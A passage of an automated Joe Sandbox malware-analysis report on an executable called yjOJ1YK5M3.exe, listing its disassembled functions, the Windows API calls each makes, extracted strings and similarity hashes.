                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AdjustPointer$_abort
                                        • String ID:
                                        • API String ID: 2252061734-0
                                        • Opcode ID: e46993260421128de9247c2f16bb29d235999988a5b09e7bcfe7cfe1d7a586cd
                                        • Instruction ID: e86b09fa13eff71e831df7ff255a397b6d5e39054d4c1aff36dea9e8f34e4821
                                        • Opcode Fuzzy Hash: e46993260421128de9247c2f16bb29d235999988a5b09e7bcfe7cfe1d7a586cd
                                        • Instruction Fuzzy Hash: E751E272A21202AFEF289F58D845BBAB3A4FF41320F14452DEC0547291E772ECE4CB90
                                        Function 0027F3BE Relevance: 7.7, APIs: 5, Instructions: 161filetimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027F3C5
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,00000050,0027B749,?,?,?,?,?,?), ref: 0027F450
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 0027F4A7
                                        • SetFileTime.KERNEL32(?,?,?,?), ref: 0027F569
                                        • CloseHandle.KERNEL32(?), ref: 0027F570
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: File$Create$CloseH_prolog3_HandleTime
                                        • String ID:
                                        • API String ID: 4002707884-0
                                        • Opcode ID: 23de5c95c50f85762cb20b2c232ed9bb64cf718be82d7f90819ffa5119b2bdce
                                        • Instruction ID: 3b6dbb7f6532a97994e9ca23b0559c4a44a3528c86b9677e2014525806b6aaf8
                                        • Opcode Fuzzy Hash: 23de5c95c50f85762cb20b2c232ed9bb64cf718be82d7f90819ffa5119b2bdce
                                        • Instruction Fuzzy Hash: 4E51D330A24249ABDF10DFE8D945BEEBBB5AF09310F244129F545F72C0D7349A55CB24
                                        Function 002A2BE0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 002A2BE9
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002A2C0C
                                          • Part of subcall function 002A040E: RtlAllocateHeap.NTDLL(00000000,0029535E,?,?,00296C16,?,?,?,?,?,00295269,0029535E,?,?,?,?), ref: 002A0440
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002A2C32
                                        • _free.LIBCMT ref: 002A2C45
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002A2C54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: 08e08cbdfe34ef24ed84dc1ffe2c85a54c410c9b86697cd345eb4afc0134886e
                                        • Instruction ID: c5819671ccc1209c45cbbb22366518a2db84e675265e5db82acc277284c5d076
                                        • Opcode Fuzzy Hash: 08e08cbdfe34ef24ed84dc1ffe2c85a54c410c9b86697cd345eb4afc0134886e
                                        • Instruction Fuzzy Hash: 8101F772721211BF37251A7E6C8CC7F7A6EDEC7B71326012AF908D2111EE60CC1595B0
                                        Function 002A0089 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(0029535E,0029535E,?,002A01D8,002A0451,?,?,00296C16,?,?,?,?,?,00295269,0029535E,?), ref: 002A008E
                                        • _free.LIBCMT ref: 002A00C3
                                        • _free.LIBCMT ref: 002A00EA
                                        • SetLastError.KERNEL32(00000000,?,0029535E), ref: 002A00F7
                                        • SetLastError.KERNEL32(00000000,?,0029535E), ref: 002A0100
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: 905088d94657b7d3ff0842128107454075517907dca717570609524011097ca2
                                        • Instruction ID: 9bf425394de4498842212c6ede9adfe660bf522a417077db25dbfc6949f379df
                                        • Opcode Fuzzy Hash: 905088d94657b7d3ff0842128107454075517907dca717570609524011097ca2
                                        • Instruction Fuzzy Hash: C40128721747026787222B747DCAF2B256ADFC3371B310129F505A3592EEB08C755520
                                        Function 002A34AF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 002A34C7
                                          • Part of subcall function 002A03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?), ref: 002A03EA
                                          • Part of subcall function 002A03D4: GetLastError.KERNEL32(?,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?,?), ref: 002A03FC
                                        • _free.LIBCMT ref: 002A34D9
                                        • _free.LIBCMT ref: 002A34EB
                                        • _free.LIBCMT ref: 002A34FD
                                        • _free.LIBCMT ref: 002A350F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 6fd48032457e0f4fd4d57580899d482a18dd49eea346bacd232feab3a8a67151
                                        • Instruction ID: 2115b58eeaf54168045691fadefb375f23ef9fe3b891548051a86494187df67a
                                        • Opcode Fuzzy Hash: 6fd48032457e0f4fd4d57580899d482a18dd49eea346bacd232feab3a8a67151
                                        • Instruction Fuzzy Hash: 77F01D32528301BB8A20EF68F8CAC1A77D9AB467107690C46F508E7901CFB4FDA0CB60
                                        Function 0029F7C0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0029F7DE
                                          • Part of subcall function 002A03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?), ref: 002A03EA
                                          • Part of subcall function 002A03D4: GetLastError.KERNEL32(?,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?,?), ref: 002A03FC
                                        • _free.LIBCMT ref: 0029F7F0
                                        • _free.LIBCMT ref: 0029F803
                                        • _free.LIBCMT ref: 0029F814
                                        • _free.LIBCMT ref: 0029F825
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 66a1eb3da41fefb1d00eb818eb50e5e4f39fdc6e30c5e0100c08f199228ce4a7
                                        • Instruction ID: ff56a816033ab66e92efc22a53ab3dcf38ded025973d5aa4b621f762dd5ed719
                                        • Opcode Fuzzy Hash: 66a1eb3da41fefb1d00eb818eb50e5e4f39fdc6e30c5e0100c08f199228ce4a7
                                        • Instruction Fuzzy Hash: 69F089704203109BDF51AF24BD4EC54BFA1FB1AB243010A9BF515A7671CB7A5861CF81
                                        Function 00291F82 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00281309: __EH_prolog3.LIBCMT ref: 00281310
                                          • Part of subcall function 00281309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,002817FB,?,?,\\?\,D946AC94,?,?,?,00000000,002AA279,000000FF), ref: 00281319
                                          • Part of subcall function 00281AD1: __EH_prolog3_GS.LIBCMT ref: 00281AD8
                                          • Part of subcall function 0027F763: __EH_prolog3_GS.LIBCMT ref: 0027F76A
                                          • Part of subcall function 0027F58B: __EH_prolog3_GS.LIBCMT ref: 0027F592
                                          • Part of subcall function 0027F58B: SetFileAttributesW.KERNELBASE(?,?,00000024,0027A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 0027F5A8
                                          • Part of subcall function 0027F58B: SetFileAttributesW.KERNEL32(?,?,?,?,?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049), ref: 0027F5EB
                                        • SHFileOperationW.SHELL32(?,00000000,?,?,?,00000000), ref: 00292137
                                        • MoveFileW.KERNEL32(?,?), ref: 002922BE
                                        • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 002922D8
                                          • Part of subcall function 002814CC: __EH_prolog3_GS.LIBCMT ref: 002814D3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
                                        • String ID: .tmp
                                        • API String ID: 1688541384-2986845003
                                        • Opcode ID: f7a08762affa912a27f8e5f9501f31eba82df4adbe7a4a3bdaada49cc1c40537
                                        • Instruction ID: a127971ef5725a5654508f60d31d3d517091b0c274249a495b53c10e1e59079b
                                        • Opcode Fuzzy Hash: f7a08762affa912a27f8e5f9501f31eba82df4adbe7a4a3bdaada49cc1c40537
                                        • Instruction Fuzzy Hash: 06C1DF71C20268DADF65EFA4C885BDDB7B8BF09300F5041EAE54DA2241DB345BA9CF20
                                        Function 0029EE2A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\yjOJ1YK5M3.exe,00000104), ref: 0029EE6A
                                        • _free.LIBCMT ref: 0029EF35
                                        • _free.LIBCMT ref: 0029EF3F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                        • API String ID: 2506810119-1307394207
                                        • Opcode ID: 87744945d10a3d15a2d62166f86e1192b86e07d82e38d6ed8eeebd0c25b98046
                                        • Instruction ID: 12cbf9ed87ad7d21eb250f4486e746ac50477b72fa59e5d76eb91ddd24fd6b6f
                                        • Opcode Fuzzy Hash: 87744945d10a3d15a2d62166f86e1192b86e07d82e38d6ed8eeebd0c25b98046
                                        • Instruction Fuzzy Hash: 86317E71A24258AFCF21DF999C89D9EBBFCEF89310F1540A6F80497201DBB19E54CB91
                                        Function 00299E56 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00299E7B
                                        • _abort.LIBCMT ref: 00299F86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: EncodePointer_abort
                                        • String ID: MOC$RCC
                                        • API String ID: 948111806-2084237596
                                        • Opcode ID: cf42a125538c90ff095cfb4285b8fa16d63878b8c77385c1230bb4c9523366a3
                                        • Instruction ID: e2e7611fa1ef34051d12640ad05645806a3f83fc6bc8637d2aeef64c2a39b5b0
                                        • Opcode Fuzzy Hash: cf42a125538c90ff095cfb4285b8fa16d63878b8c77385c1230bb4c9523366a3
                                        • Instruction Fuzzy Hash: 9D414A7191020AAFCF16DF98CD81AEEBBB5BF48314F148159FA05A7251D33699A0DF50
                                        Function 0028338E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88COMMON
                                        Download Yara Rule
                                        APIs
                                        • __fprintf_l.LIBCMT ref: 0028340E
                                        • _strncpy.LIBCMT ref: 00283459
                                          • Part of subcall function 002889ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,002BE088,?,00000007,002833E2,?,?,00000050,D946AC94), ref: 00288A0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                        • String ID: $%s$@%s
                                        • API String ID: 562999700-834177443
                                        • Opcode ID: 46d7d504bc61f1788293a40ddf78204d307710c592eb832b8491867f2959d013
                                        • Instruction ID: cfcefa6063db6870aa0014da81ebd7d1a7986c7bd6d1fea58bfb4c0890ec8a5e
                                        • Opcode Fuzzy Hash: 46d7d504bc61f1788293a40ddf78204d307710c592eb832b8491867f2959d013
                                        • Instruction Fuzzy Hash: 2121D27652170EABDB11EEA8CD45EAE7BE8FB05700F040125FA10D72C1DB31EA24CB60
                                        Function 0028F8F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0028F8F7
                                          • Part of subcall function 00271E44: GetDlgItem.USER32(00000000,00003021), ref: 00271E88
                                          • Part of subcall function 00271E44: SetWindowTextW.USER32(00000000,002AC6C8), ref: 00271E9E
                                        • EndDialog.USER32(?,00000001), ref: 0028F99F
                                        • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 0028F9E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogH_prolog3_Window
                                        • String ID: ASKNEXTVOL
                                        • API String ID: 2321058237-3402441367
                                        • Opcode ID: 060a8e4db52d4c356ec3edbafb731f4731aa119319fd0188879ee002221a0208
                                        • Instruction ID: 0294f5c1e4ac3680fd0d77fadf53780f83d60bf6742362dd66252f1605eefa63
                                        • Opcode Fuzzy Hash: 060a8e4db52d4c356ec3edbafb731f4731aa119319fd0188879ee002221a0208
                                        • Instruction Fuzzy Hash: C2218F35622115BFDB50FFA8DE4AFA937A8AF0A300F104025F5059B2E1C770AA74CF21
                                        Function 00287445 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0027FEBD,00000008,00000004,00282D42,?,?,?,?,00000000,0028ABB6,?), ref: 00287484
                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0027FEBD,00000008,00000004,00282D42,?,?,?,?,00000000), ref: 0028748E
                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0027FEBD,00000008,00000004,00282D42,?,?,?,?,00000000), ref: 0028749E
                                        Strings
                                        • Thread pool initialization failed., xrefs: 002874B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                        • String ID: Thread pool initialization failed.
                                        • API String ID: 3340455307-2182114853
                                        • Opcode ID: b2c5d481dc857af4fb9be199d0bcee0e9ec04b14b492157b27070003ed5d4664
                                        • Instruction ID: f77b5dbea7b536dba642ac140e0ba1087693646858dd631808c47322c6b6efe6
                                        • Opcode Fuzzy Hash: b2c5d481dc857af4fb9be199d0bcee0e9ec04b14b492157b27070003ed5d4664
                                        • Instruction Fuzzy Hash: 9E110AB1615709AFD3316F769C889A7FFECEB55744F20482EF1DAC3240DAB099908B50
                                        Function 0029406A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                        • API String ID: 0-56093855
                                        • Opcode ID: 2aeb3759577ad1268be4927c3760b7bea2ef68d6654b1348485e20206bfa9836
                                        • Instruction ID: 9482f93cd117057b89b529a8ad7d72a99c8ba6df40f5b688043b73fa867001b5
                                        • Opcode Fuzzy Hash: 2aeb3759577ad1268be4927c3760b7bea2ef68d6654b1348485e20206bfa9836
                                        • Instruction Fuzzy Hash: F4117C30224311ABDF14AF19FC48E267BE8E75A381B040929F646D3220D671E8E6DF61
                                        Function 00271E44 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00283EAA: _swprintf.LIBCMT ref: 00283EEA
                                          • Part of subcall function 00283EAA: _strlen.LIBCMT ref: 00283F0B
                                          • Part of subcall function 00283EAA: SetDlgItemTextW.USER32(?,002B919C,?), ref: 00283F64
                                          • Part of subcall function 00283EAA: GetWindowRect.USER32(?,?), ref: 00283F9A
                                          • Part of subcall function 00283EAA: GetClientRect.USER32(?,?), ref: 00283FA6
                                        • GetDlgItem.USER32(00000000,00003021), ref: 00271E88
                                        • SetWindowTextW.USER32(00000000,002AC6C8), ref: 00271E9E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                        • String ID: 0$gI)
                                        • API String ID: 2622349952-1724040823
                                        • Opcode ID: e52e7a024fe4d91dfd235a99ef1594d9dbe44c38a4b0df0a057813b636041c2d
                                        • Instruction ID: acf19a1b8188c855780c07e48d6b7001f3c048f8b753008b8c5cf1c9b077b4b2
                                        • Opcode Fuzzy Hash: e52e7a024fe4d91dfd235a99ef1594d9dbe44c38a4b0df0a057813b636041c2d
                                        • Instruction Fuzzy Hash: EDF0AF30524249A7DF251F65ED0AEEA3B98AF15344F088154FC4C545E1C7B4CAB0DF50
                                        Function 0029A892 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0029A843,00000000,?,002C6150,?,?,?,0029A9E6,00000004,InitializeCriticalSectionEx,002AF7F4,InitializeCriticalSectionEx), ref: 0029A89F
                                        • GetLastError.KERNEL32(?,0029A843,00000000,?,002C6150,?,?,?,0029A9E6,00000004,InitializeCriticalSectionEx,002AF7F4,InitializeCriticalSectionEx,00000000,?,0029A79D), ref: 0029A8A9
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0029A8D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID: api-ms-
                                        • API String ID: 3177248105-2084034818
                                        • Opcode ID: c7d51a48a92ac0eacb8e682a47d57789b97a480b4205aa083edeb13f85b1e042
                                        • Instruction ID: 90c9f5474c46aaf98d0cf034eb7b014d30e279af869eccd9e04208d8543f9c45
                                        • Opcode Fuzzy Hash: c7d51a48a92ac0eacb8e682a47d57789b97a480b4205aa083edeb13f85b1e042
                                        • Instruction Fuzzy Hash: DFE04F30290306B7EF201FA0ED0AB183A59AF11B91F200430FD0DA84E0DF619825AAD6
                                        Function 002A07EA Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
